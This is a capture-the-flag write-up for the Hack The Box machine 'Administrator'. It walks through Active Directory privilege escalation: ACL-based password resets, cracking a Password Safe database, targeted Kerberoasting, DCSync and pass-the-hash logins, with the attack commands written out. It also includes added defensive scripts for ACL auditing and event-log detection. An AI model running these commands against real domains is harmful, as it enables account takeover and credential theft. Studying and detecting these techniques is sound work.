# HTB - Administrator

<figure><img src="/files/bodr09rXsXHjrbLBNu2B" alt=""><figcaption></figcaption></figure>

## Description

***

Administrator is a medium-difficulty machine that follows the assume-breach methodology: you start with the credentials of a low-privileged domain user and have to work your way up from there.

## Enumeration

***

**Nmap Scan**

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $nmap -F -Pn $ip -oN Nmap/fast-scan

PORT    STATE SERVICE
21/tcp  open  ftp
53/tcp  open  domain
88/tcp  open  kerberos-sec
135/tcp open  msrpc
139/tcp open  netbios-ssn
389/tcp open  ldap
445/tcp open  microsoft-ds

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $nmap -p21,53,88,135,139,389,445 -sCV $ip -oN Nmap/script-scan

PORT    STATE SERVICE       VERSION
21/tcp  open  ftp           Microsoft ftpd
53/tcp  open  domain        Simple DNS Plus
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Active Directory LDAP (Domain: administrator.htb)
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time: 
|   date: 2024-11-10T04:07:40
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m00s
```

**Summary**

* Open ports (TCP): 21, 53, 88, 135, 139, 389, 445
* Open ports (UDP): 53, 88, 123, 389
* Services: FTP, DNS, Kerberos, RPC, SMB, LDAP
* Important notes: Domain `administrator.htb`

**hosts file**

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼  sudo sh -c "echo  '10.10.11.42 dc administrator.htb DC.administrator.htb' >> /etc/hosts"
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $tail -n1 /etc/hosts
10.10.11.42 dc administrator.htb DC.administrator.htb
```

## Foothold

***

I'm in the habit of trying newly released tools, so this time I will start the enumeration with `cicada-mastertul`, a wrapper that runs the usual impacket, BloodHound and LDAP collection in one pass using the low-privileged credentials we start with.

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $python3 cicada-mastertul.py -u Olivia -p ichliebedich -d Administrator.htb -t 10.10.11.42 --full


                         ██████╗██╗ ██████╗ █████╗ ██████╗  █████╗
                        ██╔════╝██║██╔════╝██╔══██╗██╔══██╗██╔══██╗
                        ██║     ██║██║     ███████║██║  ██║███████║
                        ██║     ██║██║     ██╔══██║██║  ██║██╔══██║
                        ╚██████╗██║╚██████╗██║  ██║██████╔╝██║  ██║
                         ╚═════╝╚═╝ ╚═════╝╚═╝  ╚═╝╚═════╝ ╚═╝  ╚═╝   
                                |__ by - theblxckcicada __|               

        ███╗   ███╗ █████╗ ███████╗████████╗███████╗██████╗ ████████╗██╗   ██╗██╗
        ████╗ ████║██╔══██╗██╔════╝╚══██╔══╝██╔════╝██╔══██╗╚══██╔══╝██║   ██║██║
        ██╔████╔██║███████║███████╗   ██║   █████╗  ██████╔╝   ██║   ██║   ██║██║
        ██║╚██╔╝██║██╔══██║╚════██║   ██║   ██╔══╝  ██╔══██╗   ██║   ██║   ██║██
        ██║ ╚═╝ ██║██║  ██║███████║   ██║   ███████╗██║  ██║   ██║   ╚██████╔╝███████╗
        ╚═╝     ╚═╝╚═╝  ╚═╝╚══════╝   ╚═╝   ╚══════╝╚═╝  ╚═╝   ╚═╝    ╚═════╝ ╚══════╝ 

..snip..
[!x!] Scanning 10.10.11.42
[!] Enumerating SMB...
[-] Could not connect to SMB 
[!] Connecting to WinRM...
[-] Could not connect to WinRM 
[!] Enumerating Lookupsids using impacket...
[+] Lookupsids saved to /home/kali/HackTheBox/platform/machines/Administrator/mastertul/10.10.11.42/lookupsid_results/lookupsid_file.txt
[+] Users list saved to /home/kali/HackTheBox/platform/machines/Administrator/mastertul/10.10.11.42/lookupsid_results/users.txt
[!] Enumerating NPUsers using impacket...
[-] No NPUsers found
[!] Enumerating UserSPNs using impacket...
[-] No UserSPNs found
[!] Collecting Bloodhound Files...
[+] Bloodhound saved to /home/kali/HackTheBox/platform/machines/Administrator/mastertul/10.10.11.42/bloodhound_results
[!] Enumerating LDAP...
[+] LDAP saved to /home/kali/HackTheBox/platform/machines/Administrator/mastertul/10.10.11.42/ldap_results
```

After collecting data with `bloodhound` and `ldapdomaindump`, I will enumerate the domain for possible `Domain Escalation` paths.

* Looking at BloodHound CE, user `Olivia` has `GenericAll` on `Michael`, which means she can:
  1. Assign a fake SPN to him and perform a targeted Kerberoast attack
  2. Reset his password
  3. Perform a Shadow Credentials attack (requires PKINIT to be available on the DC)

<figure><img src="/files/cTB2JSPhwmkXP237fiud" alt=""><figcaption></figcaption></figure>

And `Michael` has `ForceChangePassword` on `Benjamin`.

<figure><img src="/files/q562eijMdonlF6kD5cv5" alt=""><figcaption></figcaption></figure>
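These two edges are exactly what a periodic ACL audit should surface before an attacker does. The script below is an added example, not code from this write-up or from BloodHound: it walks SharpHound-style `users` and `domains` JSON and reports every principal outside the expected admin groups that holds a takeover right on a user object, or both replication rights on the domain head (the DCSync case that matters later on this box). The JSON, SIDs and object names are constructed here to mirror the edges in the write-up; the field names it assumes are `ObjectIdentifier`, `Properties.name` and `Aces[].PrincipalSID` / `RightName`.

```python
"""Audit SharpHound-style ACE data for the control edges a domain attacker chains.

Added example (not part of the original write-up or of BloodHound). The JSON layout
mirrors what SharpHound emits for users and domains (ObjectIdentifier, Properties.name,
Aces[].PrincipalSID / RightName); every SID, name and ACE below is constructed.
"""
from collections import defaultdict

# Rights on a user object that hand that account to the ACE principal.
USER_TAKEOVER_RIGHTS = {
    "GenericAll": "reset password, targeted Kerberoast or shadow credentials",
    "GenericWrite": "targeted Kerberoast or shadow credentials",
    "ForceChangePassword": "reset password",
    "AllExtendedRights": "reset password (includes ForceChangePassword)",
    "AddKeyCredentialLink": "shadow credentials",
    "WriteDacl": "grant itself any right",
    "WriteOwner": "take ownership, then grant itself any right",
}
# Holding both replication rights on the domain head is what DCSync needs.
DCSYNC_RIGHTS = frozenset({"GetChanges", "GetChangesAll"})

# Principals expected to hold such rights; anything else is a finding.
EXPECTED_RIDS = {"498", "512", "516", "519"}  # ERODC, Domain Admins, Domain Controllers, Enterprise Admins
EXPECTED_SIDS = {"S-1-5-32-544", "S-1-5-18"}  # BUILTIN\Administrators, LOCAL SYSTEM


def is_expected_principal(sid):
    return sid in EXPECTED_SIDS or sid.rsplit("-", 1)[-1] in EXPECTED_RIDS


def audit(users, domains):
    """Return (principal, right, target, consequence) tuples for unexpected control."""
    names = {o["ObjectIdentifier"]: o["Properties"]["name"] for o in users["data"] + domains["data"]}

    def label(sid):
        return names.get(sid, sid)

    findings = []
    for user in users["data"]:
        for ace in user.get("Aces", []):
            right = ace["RightName"]
            if right in USER_TAKEOVER_RIGHTS and not is_expected_principal(ace["PrincipalSID"]):
                findings.append((label(ace["PrincipalSID"]), right,
                                 user["Properties"]["name"], USER_TAKEOVER_RIGHTS[right]))
    for dom in domains["data"]:
        held = defaultdict(set)
        for ace in dom.get("Aces", []):
            if ace["RightName"] in DCSYNC_RIGHTS:
                held[ace["PrincipalSID"]].add(ace["RightName"])
        for sid, rights in held.items():
            # GetChanges alone (e.g. a sync service) is not DCSync; both rights together are.
            if rights >= DCSYNC_RIGHTS and not is_expected_principal(sid):
                findings.append((label(sid), "DCSync", dom["Properties"]["name"],
                                 "replicate every account's secrets"))
    return findings


# --- constructed sample data mirroring the edges in this write-up -----------------
DOM = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed domain SID


def _ace(rid, right):
    return {"PrincipalSID": f"{DOM}-{rid}", "PrincipalType": "User",
            "RightName": right, "IsInherited": False}


def _obj(rid, name, aces=()):
    return {"ObjectIdentifier": f"{DOM}-{rid}", "Properties": {"name": name}, "Aces": list(aces)}


SAMPLE_USERS = {"meta": {"type": "users"}, "data": [
    _obj(1107, "OLIVIA@ADMINISTRATOR.HTB"),
    _obj(1108, "MICHAEL@ADMINISTRATOR.HTB", [_ace(1107, "GenericAll"), _ace(512, "GenericAll")]),
    _obj(1109, "BENJAMIN@ADMINISTRATOR.HTB", [_ace(1108, "ForceChangePassword")]),
    _obj(1110, "EMILY@ADMINISTRATOR.HTB"),
    _obj(1111, "ETHAN@ADMINISTRATOR.HTB", [_ace(1110, "GenericWrite")]),
]}
SAMPLE_DOMAINS = {"meta": {"type": "domains"}, "data": [{
    "ObjectIdentifier": DOM, "Properties": {"name": "ADMINISTRATOR.HTB"},
    "Aces": [_ace(512, "GetChanges"), _ace(512, "GetChangesAll"),    # Domain Admins: expected
             _ace(1111, "GetChanges"), _ace(1111, "GetChangesAll"),  # Ethan: finding
             _ace(1109, "GetChanges")],                              # one right only: not DCSync
}]}

if __name__ == "__main__":
    for who, right, target, what in audit(SAMPLE_USERS, SAMPLE_DOMAINS):
        print(f"{who:<28} {right:<20} -> {target:<28} ({what})")
```

Run against real SharpHound output, the same four findings would be the attack path of this box read backwards; the Domain Admins ACE on `Michael` is filtered out because that group is expected to hold it.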

To perform this attack entirely from Linux, I will use Samba's `net rpc password` to reset the two passwords in turn:

```bash
net rpc password "michael" 'P@ssw00rd!231!!!' -U "administrator.htb"/"Olivia"%'ichliebedich' -S dc.administrator.htb

net rpc password "benjamin" 'P@ssw00rd!555!!!' -U "administrator.htb"/"michael"%'P@ssw00rd!231!!!' -S dc.administrator.htb
```

Now I have `Benjamin`'s account, and he is a member of the `Share Moderators` group.

<figure><img src="/files/UGy5LmGX57p0AIUjR0pK" alt=""><figcaption></figcaption></figure>

When I looked through the shares for juicy files, I didn't find anything useful; the `spider_plus` module of `nxc` only lists the default policy files in `SYSVOL`.

<figure><img src="/files/9ePPcjgC7eVMzVdti8b9" alt=""><figcaption></figcaption></figure>

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $cat /tmp/nxc_hosted/nxc_spider_plus/10.10.11.42.json
{
    "NETLOGON": {},
    "SYSVOL": {
        "administrator.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
            "atime_epoch": "2024-10-30 17:22:19",
            "ctime_epoch": "2024-10-04 15:48:32",
            "mtime_epoch": "2024-10-30 17:22:19",
            "size": "23 B"
        },
        "administrator.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2024-10-30 17:22:19",
            "ctime_epoch": "2024-10-04 15:48:32",
            "mtime_epoch": "2024-10-30 17:22:19",
            "size": "1.07 KB"
        },
        "administrator.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
            "atime_epoch": "2024-10-04 15:55:13",
            "ctime_epoch": "2024-10-04 15:55:13",
            "mtime_epoch": "2024-10-04 15:55:13",
            "size": "2.74 KB"
        },
        "administrator.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
            "atime_epoch": "2024-10-30 19:56:19",
            "ctime_epoch": "2024-10-04 15:48:32",
            "mtime_epoch": "2024-10-30 19:56:19",
            "size": "22 B"
        },
        "administrator.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2024-10-30 17:22:53",
            "ctime_epoch": "2024-10-04 15:48:32",
            "mtime_epoch": "2024-10-30 17:22:53",
            "size": "4.16 KB"
        },
        "administrator.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Registry.pol": {
            "atime_epoch": "2024-10-30 19:56:19",
            "ctime_epoch": "2024-10-30 19:56:19",
            "mtime_epoch": "2024-10-30 19:56:19",
            "size": "184 B"
        },
        "administrator.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/comment.cmtx": {
            "atime_epoch": "2024-10-30 19:56:19",
            "ctime_epoch": "2024-10-30 19:56:19",
            "mtime_epoch": "2024-10-30 19:56:19",
            "size": "553 B"
        }
    }
}
```

I will then move to `ftp` with the two new accounts, using `FileZilla`. Michael's account doesn't have any files, but `benjamin`'s does.

<figure><img src="/files/LZaZ0QEh5LQN4VVb7Oha" alt=""><figcaption></figcaption></figure>

After downloading the file, it turns out to be a Password Safe V3 database, which is encrypted with a master password.

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $file Backup.psafe3 
Backup.psafe3: Password Safe V3 database
```

I used `pwsafe2john` to extract a crackable hash from the database header:

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $pwsafe2john Backup.psafe3 > psafe3.hash

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $cat psafe3.hash 
Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050
```
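The line `pwsafe2john` prints is just the three header fields a Password Safe client itself uses to check the master password: the salt, the iteration count and `H(P')`. The following is an added example, not code from this write-up, from John the Ripper or from Password Safe; it implements the published PWS3 key stretching (`P'` is SHA-256 iterated `ITER` times over `SHA-256(password || SALT)`, and the file stores `SHA-256(P')`), parses both the john line and the raw 72-byte file header, and shows why an `ITER` of 2048 makes a wordlist run cheap. The test database header it builds is constructed.

```python
"""Password Safe V3 key stretching, as exported by pwsafe2john.

Added example; not from the write-up, John the Ripper or Password Safe. Follows the
published PWS3 format: P' = SHA-256 iterated ITER times over SHA-256(password || SALT),
and the file stores H(P') = SHA-256(P') so a client can check the master password
before trying to decrypt anything.
"""
import hashlib
import hmac
import os
import struct

# Hash line exactly as pwsafe2john printed it on this page.
PAGE_HASH_LINE = ("Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa"
                  "*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050")


def parse_john_line(line):
    """'name:$pwsafe$*3*SALT*ITER*H(P')' -> fields with hex decoded to bytes."""
    name, payload = line.split(":", 1)
    tag, version, salt_hex, iters, hash_hex = payload.split("*")
    if tag != "$pwsafe$" or version != "3":
        raise ValueError("not a pwsafe2john v3 line")
    return {"name": name, "salt": bytes.fromhex(salt_hex),
            "iterations": int(iters), "hash": bytes.fromhex(hash_hex)}


def parse_psafe3_header(blob):
    """TAG(4) | SALT(32) | ITER(4, little-endian) | H(P')(32): first 72 bytes of a .psafe3 file."""
    if blob[:4] != b"PWS3":
        raise ValueError("not a Password Safe V3 database")
    iterations = struct.unpack("<I", blob[36:40])[0]
    return {"name": "", "salt": blob[4:36], "iterations": iterations, "hash": blob[40:72]}


def build_psafe3_header(fields):
    """Inverse of parse_psafe3_header; used here to construct a test database header."""
    return b"PWS3" + fields["salt"] + struct.pack("<I", fields["iterations"]) + fields["hash"]


def stretch(password, salt, iterations):
    """P' per the PWS3 spec: one salted hash, then ITER plain re-hashes."""
    x = hashlib.sha256(password.encode("utf-8") + salt).digest()
    for _ in range(iterations):
        x = hashlib.sha256(x).digest()
    return x


def verify_master_password(fields, candidate):
    """The check a Password Safe client makes before decrypting the file."""
    stretched = stretch(candidate, fields["salt"], fields["iterations"])
    return hmac.compare_digest(hashlib.sha256(stretched).digest(), fields["hash"])


def new_header_fields(password, iterations=2048, salt=None):
    """Constructed header fields for a database protected by `password` (for testing)."""
    salt = salt if salt is not None else os.urandom(32)
    return {"name": "new", "salt": salt, "iterations": iterations,
            "hash": hashlib.sha256(stretch(password, salt, iterations)).digest()}


def work_factor(fields):
    """SHA-256 calls per guess: 1 salted + ITER re-hashes for P', plus 1 for H(P')."""
    return fields["iterations"] + 2


if __name__ == "__main__":
    fields = parse_john_line(PAGE_HASH_LINE)
    print(f"{fields['name']}: ITER={fields['iterations']}, "
          f"{work_factor(fields)} SHA-256 calls per guess")
```

With `ITER` at the format's 2048 minimum, each guess costs about two thousand SHA-256 calls, which is why a rockyou run against this header finishes in seconds. The defence is on the owner's side: a long master passphrase, and a higher iteration count, which PWS3 stores per database.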

Using `john the ripper`, I cracked this hash successfully

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $john hash --wordlist=/usr/share/wordlists/rockyou.txt 

..snip..
tekieromucho     (Backu)
```

Then I downloaded the Password Safe client to my Windows machine, opened the database with the cracked master password and exported all the entries to a `.txt` file.

{% embed url="https://www.pwsafe.org/" %}

<figure><img src="/files/g6vRlZkvk03qolP1Afkx" alt=""><figcaption></figcaption></figure>

```powershell
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $evil-winrm -i dc -u emily -p UXLCI5iETUsIBoFVxxxxxxxxxx

*Evil-WinRM* PS C:\Users\emily\Desktop> type user.txt
78a12ed55133ef7aa5b8xxxxxxxxxx
```

## Privilege Escalation

***

* User `Emily` has `GenericWrite` on `Ethan`, so she can do the following:
  1. Targeted Kerberoast attack
  2. Shadow Credentials

<figure><img src="/files/YtyAYVXxHjqnRLNx13bw" alt=""><figcaption></figcaption></figure>

User `Ethan` has `DCSync` rights, so I can dump the `ntds` database with this account.

<figure><img src="/files/qSBG4kCy9ELZWuI1kurf" alt=""><figcaption></figcaption></figure>
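Every hop of this chain leaves a trace in the Security log on the DC: the two password resets in the foothold (4724), the targeted Kerberoast that follows (4769 with RC4), and the DCSync itself (4662 with the replication GUIDs). The script below is an added example, not part of this write-up, that runs those three detections over constructed event lines. The one-event-per-line `key=value` layout is made up for the example; the field names (`SubjectUserName`, `TargetUserName`, `ServiceName`, `TicketEncryptionType`, `Properties`) follow the Security log's event data, and all values are constructed to resemble this box.

```python
"""Flag this box's abuse chain in Windows Security events (defender side).

Added example, not part of the original post. Input is a constructed, simplified
export: one event per line, key=value fields joined by '|'. Field names follow the
Security log's event data; the line layout and all values are made up here.
"""
from datetime import datetime, timedelta

# Extended-right GUID logged in 4662 when someone replicates secrets (DCSync).
GET_CHANGES_ALL = "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"  # DS-Replication-Get-Changes-All

SAMPLE_EVENTS = """\
Time=2024-11-10T04:10:00|EventID=4724|SubjectUserName=Olivia|TargetUserName=michael
Time=2024-11-10T04:12:30|EventID=4724|SubjectUserName=michael|TargetUserName=benjamin
Time=2024-11-10T04:15:00|EventID=4724|SubjectUserName=helpdesk1|TargetUserName=alice
Time=2024-11-10T04:40:00|EventID=4769|TargetUserName=emily@ADMINISTRATOR.HTB|ServiceName=ethan|TicketEncryptionType=0x17
Time=2024-11-10T04:41:00|EventID=4769|TargetUserName=emily@ADMINISTRATOR.HTB|ServiceName=DC$|TicketEncryptionType=0x12
Time=2024-11-10T04:55:00|EventID=4662|SubjectUserName=ethan|Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
Time=2024-11-10T04:56:00|EventID=4662|SubjectUserName=DC$|Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
"""


def parse_events(text):
    """One dict per non-empty line; Time is also kept parsed under '_time'."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = dict(field.split("=", 1) for field in line.split("|"))
        ev["_time"] = datetime.fromisoformat(ev["Time"])
        events.append(ev)
    return events


def reset_edges(events, allowlist=frozenset()):
    """4724 (an attempt was made to reset an account's password) by a non-helpdesk subject."""
    return [(e["_time"], e["SubjectUserName"].lower(), e["TargetUserName"].lower())
            for e in events
            if e["EventID"] == "4724" and e["SubjectUserName"].lower() not in allowlist]


def reset_chains(edges, window=timedelta(hours=1)):
    """A resets B, then B resets C within the window: the ACL-hop pattern of this box."""
    chains = []
    for t1, a, b in edges:
        for t2, c, d in edges:
            if c == b and timedelta(0) <= t2 - t1 <= window:
                chains.append((a, b, d))
    return chains


def rc4_user_service_tickets(events):
    """4769 with RC4 (0x17) for a user-account SPN: the Kerberoast signature."""
    return [(e["TargetUserName"], e["ServiceName"]) for e in events
            if e["EventID"] == "4769" and e["TicketEncryptionType"].lower() == "0x17"
            and not e["ServiceName"].endswith("$") and e["ServiceName"].lower() != "krbtgt"]


def dcsync_suspects(events):
    """4662 exercising Get-Changes-All by anything other than a DC machine account."""
    return [(e["SubjectUserName"], e["Time"]) for e in events
            if e["EventID"] == "4662" and GET_CHANGES_ALL in e.get("Properties", "")
            and not e["SubjectUserName"].endswith("$")]


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    edges = reset_edges(evs, allowlist=frozenset({"helpdesk1"}))
    print("reset chains:", reset_chains(edges))
    print("RC4 user-SPN tickets:", rc4_user_service_tickets(evs))
    print("DCSync suspects:", dcsync_suspects(evs))
```

On real logs the 4662 rule needs directory-service access auditing enabled on the domain head, and the 4769 rule should be paired with the SPN-modification audit (5136 on `servicePrincipalName`), since `targetedKerberoast` adds and then removes the SPN within seconds.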

Abusing `GenericWrite` with `targetedKerberoast`, which adds a temporary SPN to `Ethan`, requests a service ticket for it and removes the SPN again:

```bash
/opt/targetedKerberoast/targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8xxxxxxxxx'
```

<figure><img src="/files/xScxTJ0mhhmYH6YnmZBJ" alt=""><figcaption></figcaption></figure>

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $hashcat -m 13100 ethan.hash /usr/share/wordlists/rockyou.txt 

..snip..
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$8e4f007c95ee9cefd15d2a413649e2cb$..snip..:xxxxxxxxxx

Session..........: hashcat
Status...........: Cracked
```

Dump the Administrator hash via DCSync using Ethan's account:

<figure><img src="/files/WvS48uOc6K3Uk7S3jy67" alt=""><figcaption></figcaption></figure>

```powershell
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Administrator]
└──╼ $evil-winrm -i dc -u administrator -H 3dc553ce4b9fd20bd01xxxxxxxxxxx

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
b42e8a0a9a5c81e4b7f8xxxxxxxxxxxxx
```

> Root Flag: b42e8a0a9a5c81e4b7f8xxxxxxxxxxxxx

